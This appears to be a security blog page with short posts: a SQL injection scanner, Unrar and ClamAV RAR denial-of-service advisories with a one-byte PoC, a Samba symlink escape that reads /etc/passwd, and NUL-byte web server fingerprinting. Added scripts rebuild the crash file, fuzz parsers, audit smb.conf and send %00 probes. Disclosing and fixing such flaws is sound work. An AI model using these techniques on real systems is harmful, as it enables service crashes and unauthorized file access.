METAEYE SG

•  SQID - SQL Injection Digger.

SQL Injection Digger is a command line program that looks for SQL injections and
common errors in web sites. The current version can perform the following operations:

* Look for SQL injections and common errors in web site URLs found by a Google search.
* Look for SQL injections and common errors in a given URL or in a file of URLs.
* Look for SQL injections and common errors in the links of a web page.
* Crawl a web site or web page and do the above.

It also supports:

* Loading multiple triggers from a file.
* Loading multiple signature databases from files.
* HTTPS.
* HTTP proxies, with authentication.
* Basic authentication.
* A user-specified User-Agent.
* A user-specified Referer.
* HTTP cookies loaded from the command line or from a file.

Find out more at http://sqid.rubyforge.org.



•  Unrar for Linux Denial Of Service vulnerability.

Vendor: RARLABS (http://www.rarlabs.com)

Product: Unrar for Linux (freeware).

Versions affected: All up to 3.70 beta 4

Severity: Moderate

Issue

Unrar for Linux crashes while processing standard filters in the RAR VM when it handles a
specially crafted compressed RAR file. The crash occurs only while extracting the contents
of the archive.

Impact

Any program that uses the unrar for Linux code from RARLABS to process RAR files is
vulnerable as well.

PoC

http://www.metaeye.org/codes/corrupted.rar
The corrupted file differs from the original by a single byte: at offset 0xE9, 0x80 is changed to 0x81.

References

1. Bugtraq BID 24866.

Status

Reported: 20/06/2007
Fixed in version 3.7 beta 5.



•  Clam AntiVirus RAR File Handling Denial Of Service Vulnerability.

Vendor: Clam AntiVirus (http://www.clamav.net)

Product: Clamav (libclamav)

Versions Affected: All before 0.91

Severity: Moderate

Issue

Clamav crashes while processing standard filters in the RAR VM when it handles a
corrupted RAR file. Processing the corrupted file results in a null pointer dereference.

Impact

Processing the corrupted file crashes both the clamscan application and the
clamd daemon.

Fix

Upgrade to version 0.91.

PoC

http://www.metaeye.org/codes/corrupted.rar
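The same corrupted.rar serves as the PoC for the unrar advisory above and for this one, and in both cases it is a clean archive with one byte changed. The script below is an added example, not part of either advisory or of the vendors' code: it rebuilds that kind of PoC from a clean seed archive (refusing to patch a seed that does not hold 0x80 at 0xE9), diffs the result against the seed, and can walk every single-bit flip in a byte range, running a target on each mutant and reporting runs that die from a signal. The target command lines (for example `unrar x -o+ @@ /tmp/out/` or `clamscan @@`), the seed file and the scratch path are assumptions; SAMPLE_SEED is a constructed blob for the self-test, not a RAR archive.

```python
#!/usr/bin/env python3
"""Single-byte mutation harness for RAR parsers (added example, not from the advisory).

The PoC for both advisories differs from a clean archive by one byte (offset 0xE9,
0x80 -> 0x81).  This script rebuilds that kind of PoC from a seed archive and can
also walk every single-bit flip in a byte range, running a target on each mutant
and recording signal deaths.  The target command lines, the seed file and the
scratch path are assumptions; SAMPLE_SEED is a constructed blob, not a RAR file.
"""
import signal
import subprocess
import sys
from typing import Iterator, List, Optional, Tuple

POC_OFFSET, POC_ORIG, POC_NEW = 0xE9, 0x80, 0x81   # the advisory's one-byte change
MUTANT_PATH = "mutant.rar"                           # scratch file, assumption

# Constructed for the self-test only: 0x80 at offset 0xE9, zeros elsewhere.
SAMPLE_SEED = b"\x00" * POC_OFFSET + b"\x80" + b"\x00" * 15


def patch_byte(data: bytes, offset: int, new: int, expect: Optional[int] = None) -> bytes:
    """Copy of `data` with the byte at `offset` replaced by `new`.

    With `expect` set, refuse to patch a seed that does not hold that value
    there, so a wrong seed is caught before anything reaches the target.
    """
    if not 0 <= offset < len(data):
        raise ValueError(f"offset {offset:#x} outside file of {len(data)} bytes")
    if expect is not None and data[offset] != expect:
        raise ValueError(f"byte at {offset:#x} is {data[offset]:#04x}, expected {expect:#04x}")
    buf = bytearray(data)
    buf[offset] = new & 0xFF
    return bytes(buf)


def byte_diff(a: bytes, b: bytes) -> List[Tuple[int, int, int]]:
    """(offset, old, new) for each byte that differs between two same-size blobs."""
    if len(a) != len(b):
        raise ValueError("inputs differ in length; this diff is for same-size mutations")
    return [(i, x, y) for i, (x, y) in enumerate(zip(a, b)) if x != y]


def bit_flip_mutants(data: bytes, start: int, end: int) -> Iterator[Tuple[int, int, bytes]]:
    """Yield (offset, new_byte, mutant) for every single-bit flip in [start, end).

    The advisory's 0x80 -> 0x81 is one of these: bit 0 of the byte at 0xE9.
    """
    for off in range(max(start, 0), min(end, len(data))):
        for bit in range(8):
            new = data[off] ^ (1 << bit)
            yield off, new, patch_byte(data, off, new)


def run_target(argv: List[str], timeout: float = 10.0) -> Tuple[str, int]:
    """Run the target once; return ('ok'|'error'|'crash'|'timeout', detail).

    A negative return code means the process died from a signal (SIGSEGV for a
    null-pointer dereference, for instance); `detail` is then the signal number.
    """
    try:
        proc = subprocess.run(argv, stdout=subprocess.DEVNULL,
                              stderr=subprocess.DEVNULL, timeout=timeout)
    except subprocess.TimeoutExpired:
        return "timeout", 0
    if proc.returncode < 0:
        return "crash", -proc.returncode
    return ("ok" if proc.returncode == 0 else "error"), proc.returncode


def main() -> None:
    if len(sys.argv) == 3:
        # mutate.py <clean.rar> <out.rar>: rebuild the advisory's PoC from a clean seed
        seed = open(sys.argv[1], "rb").read()
        poc = patch_byte(seed, POC_OFFSET, POC_NEW, expect=POC_ORIG)
        open(sys.argv[2], "wb").write(poc)
        print("wrote", sys.argv[2], "changes:",
              [(hex(o), hex(x), hex(y)) for o, x, y in byte_diff(seed, poc)])
    elif len(sys.argv) >= 6 and sys.argv[1] == "--fuzz":
        # mutate.py --fuzz <seed> <start> <end> <cmd...>  with @@ standing for the mutant,
        # e.g. ... unrar x -o+ @@ /tmp/out/   or   ... clamscan @@   (assumed invocations)
        seed = open(sys.argv[2], "rb").read()
        start, end = int(sys.argv[3], 0), int(sys.argv[4], 0)
        for off, new, mutant in bit_flip_mutants(seed, start, end):
            open(MUTANT_PATH, "wb").write(mutant)
            argv = [MUTANT_PATH if a == "@@" else a for a in sys.argv[5:]]
            kind, detail = run_target(argv)
            if kind in ("crash", "timeout"):
                sig = signal.Signals(detail).name if kind == "crash" else "-"
                print(f"{kind} at {off:#x}: {seed[off]:#04x} -> {new:#04x} ({sig})")
    else:
        sys.exit(f"usage: {sys.argv[0]} <clean.rar> <out.rar> | "
                 f"--fuzz <seed> <start> <end> <cmd with @@>")


if __name__ == "__main__":
    main()
```

Run it as `mutate.py clean.rar corrupted.rar` to reproduce the one-byte PoC from your own clean archive, or with `--fuzz clean.rar 0xE0 0xF0 unrar x -o+ @@ /tmp/out/` to try every bit flip in the neighbourhood of the PoC offset; since the unrar bug only triggers on extraction, a mere `unrar t` run is not a reliable target.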

Vendor Status

Reported: 25/06/2007
Fixed: 11/07/2007

References

1. Clamav bugzilla bug id 555.
2. Secunia advisory SA26038.
3. Bugtraq ID 24866.
4. CVE-2007-3725.



•  Watch out for writable samba shares.

Noticed a security issue with the default Samba configuration shipped with most Linux distros.

For example, let's say we have a system A with a writable share XYZ. On another system B,
we mount the share and create a symlink to /, i.e. to the root directory, inside it.

[root@B] smbmount //A/XYZ /mnt/share -o username=test
Password:
[root@B] ln -s / /mnt/share/ROOT

Now using the smbclient tool to access the share

[root@B] smbclient -U test //A/XYZ
Password:
Domain=[A] OS=[Unix] Server=[Samba 3.0.26a]
smb: \> ls ROOT/etc/passwd
passwd 879 Tue Sep 4 16:11:56 2007
37760 blocks of size 1048576. 9355 blocks available
smb: \>

As you can see, the whole file system of A is now reachable through the share, and the attacker
can download every file on A that the share's user is allowed to read. The symlink is created
on A's own disk through the CIFS Unix extensions, and smbd follows it because the default
wide links = yes lets symlinks resolve to targets outside the share's path.

To make sure this does not happen, add the following directive to the [global] section of
smb.conf (a share may still override it with its own wide links = yes):

wide links=no

Later Samba releases (3.4.6 and 3.5.1 onwards) default wide links to no and force it off
while unix extensions = yes, so the directive only needs to be set by hand on the 3.0.x
servers of the time.
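The following is an added example, not a Samba tool or anything from the original post: it reads an smb.conf, folds the writable/writeable/write ok synonyms into read only the way Samba does, and lists writable shares where the share-level or global wide links and follow symlinks settings still allow a symlink to escape the share. Compiled-in defaults follow the Samba 3.0.x servers of the time (wide links = yes); with modern=True it models 3.4.6/3.5.1 and later, where wide links defaults to no and is forced off while unix extensions = yes. Parsing covers only a small subset of the syntax (no %-macros, no include =), and SAMPLE_SMB_CONF is constructed for the self-test.

```python
#!/usr/bin/env python3
"""Audit an smb.conf for writable shares that will follow symlinks out of the share.

Added example for the issue above, not a Samba tool.  It reads a small subset of
smb.conf syntax (no %-macros, no `include =`).  Compiled-in defaults follow the
Samba 3.0.x servers of the time (`wide links = yes`); with modern=True it models
Samba 3.4.6/3.5.1 and later, where `wide links` defaults to no and is forced off
whenever `unix extensions = yes`.  SAMPLE_SMB_CONF is constructed for the self-test.
"""
import re
from typing import Dict, List

Section = Dict[str, str]

# Constructed sample: XYZ is the share from the walkthrough above.
SAMPLE_SMB_CONF = """\
[global]
   workgroup = WORKGROUP
   unix extensions = yes

[XYZ]
   path = /srv/xyz
   writable = yes

[docs]
   path = /srv/docs
   read only = yes

[safe]
   path = /srv/safe
   writeable = yes
   wide links = no
"""


def as_bool(val: str) -> bool:
    return val.strip().lower() in ("yes", "true", "1")


def parse_smb_conf(text: str) -> Dict[str, Section]:
    """Return {section: {parameter: value}}.

    Parameter names are lower-cased with whitespace removed, as Samba compares
    them, and the writable/writeable/write ok synonyms are folded into `readonly`
    so that the last setting in the file wins, as it does in Samba.
    """
    conf: Dict[str, Section] = {}
    cur = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        m = re.match(r"\[(.+)\]$", line)
        if m:
            name = m.group(1).strip()
            cur = "global" if name.lower() == "global" else name
            conf.setdefault(cur, {})
            continue
        if cur is None or "=" not in line:
            continue
        key, _, val = line.partition("=")
        key, val = re.sub(r"\s+", "", key).lower(), val.strip()
        if key in ("writable", "writeable", "writeok"):
            key, val = "readonly", ("no" if as_bool(val) else "yes")
        conf[cur][key] = val
    return conf


def effective(conf: Dict[str, Section], share: str, key: str, default: str) -> str:
    """Share-level value, else the [global] value, else the compiled-in default."""
    return conf[share].get(key, conf.get("global", {}).get(key, default))


def audit(text: str, modern: bool = False) -> List[str]:
    """Names of writable shares from which a symlink can reach outside the share path."""
    conf = parse_smb_conf(text)
    unix_ext = as_bool(conf.get("global", {}).get("unixextensions", "yes"))
    findings = []
    for name in conf:
        if name == "global":
            continue
        if as_bool(effective(conf, name, "readonly", "yes")):
            continue                       # attacker cannot plant the symlink
        wide = as_bool(effective(conf, name, "widelinks", "no" if modern else "yes"))
        if modern and unix_ext:
            wide = False                   # forced off since 3.4.6/3.5.1
        follow = as_bool(effective(conf, name, "followsymlinks", "yes"))
        if wide and follow:
            findings.append(name)
    return findings


def harden(text: str) -> str:
    """Add `wide links = no` to [global], creating the section if it is missing.

    A share that sets `wide links = yes` itself still overrides this; audit() shows it.
    """
    if "[global]" not in text.lower():
        return "[global]\n   wide links = no\n\n" + text
    out = []
    for line in text.splitlines():
        out.append(line)
        if line.strip().lower() == "[global]":
            out.append("   wide links = no")
    return "\n".join(out) + "\n"


if __name__ == "__main__":
    import sys
    path = sys.argv[1] if len(sys.argv) > 1 else "/etc/samba/smb.conf"
    print("shares exposing the host file system:", audit(open(path).read()))
```

On the constructed sample the audit flags only XYZ: docs is read only, so the attacker cannot plant the symlink, and safe already sets wide links = no; after harden() nothing is flagged, and with modern=True the same file is clean without any change because the newer servers ignore wide links while Unix extensions are on.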



•  Fingerprinting web servers with a %00.

%00 is the URL-encoded form of the NUL byte. It is interesting to see how
different web servers behave when a NUL character appears in the path of a GET request.

I use a simple Python program that accepts the web site name and the URL to get, and reports
the web server version, if the Server header gives one, together with the HTTP response code.

% ./uget.py
usage: ./uget.py <website name> <url>
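uget.py itself is not shown on the page. The script below is an added example of the same kind of probe, written here rather than taken from the original post: it sends the request over a raw socket so that the three characters `%00` reach the server exactly as typed (an HTTP client library may normalize or reject them, and it is the server's handling of the NUL that we want to observe), then parses the status line and the Server header. It sends the URL as given and once more with %00 appended, so the two answers can be compared. The host names, paths and SAMPLE_RESPONSE are constructed for the self-test.

```python
#!/usr/bin/env python3
"""Send a GET whose path contains %00 and report the status code and Server header.

Added example for the check described above; uget.py from the original post is not
on the page and this is not that program.  The request goes over a raw socket so the
three characters `%00` reach the server untouched; the server, not the client,
decides what the NUL means.  SAMPLE_RESPONSE is constructed for the self-test.
"""
import socket
import sys
from typing import Optional, Tuple

# Constructed sample of what a server might send back; not a real observation.
SAMPLE_RESPONSE = (b"HTTP/1.1 400 Bad Request\r\n"
                   b"Server: Apache/2.2.3 (Debian)\r\n"
                   b"Content-Length: 0\r\n\r\n")


def build_request(host: str, path: str) -> bytes:
    """Minimal HTTP/1.0 GET; the path is sent verbatim, so '%00' stays encoded."""
    if "\x00" in path or "\r" in path or "\n" in path:
        raise ValueError("path must be URL-encoded; use %00 for the NUL byte")
    return (f"GET {path} HTTP/1.0\r\n"
            f"Host: {host}\r\n"
            f"User-Agent: nul-probe-example\r\n"
            f"Connection: close\r\n\r\n").encode("ascii")


def parse_response(raw: bytes) -> Tuple[int, str, Optional[str]]:
    """Return (status_code, reason, Server header or None) from a raw response."""
    head = raw.partition(b"\r\n\r\n")[0].decode("iso-8859-1", "replace")
    lines = head.split("\r\n")
    version, _, rest = lines[0].partition(" ")
    if not version.startswith("HTTP/"):
        raise ValueError("not an HTTP status line: " + lines[0][:40])
    code, _, reason = rest.partition(" ")
    server = None
    for header in lines[1:]:
        name, _, value = header.partition(":")
        if name.strip().lower() == "server":
            server = value.strip()
    return int(code), reason, server


def probe(host: str, path: str, port: int = 80,
          timeout: float = 10.0) -> Tuple[int, str, Optional[str]]:
    """Connect, send the request and parse whatever the server returns."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_request(host, path))
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return parse_response(b"".join(chunks))


def main() -> None:
    if len(sys.argv) != 3:
        sys.exit(f"usage: {sys.argv[0]} <website name> <url>")
    host, path = sys.argv[1], sys.argv[2]
    # Send the URL as given and once more with %00 appended; how the server
    # reacts to the NUL is what differs between implementations.
    for p in (path, path + "%00"):
        code, reason, server = probe(host, p)
        print(f"{host} {p}: {code} {reason}  server={server or 'n/a'}")


if __name__ == "__main__":
    main()
```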

continued…



[ © MSG ]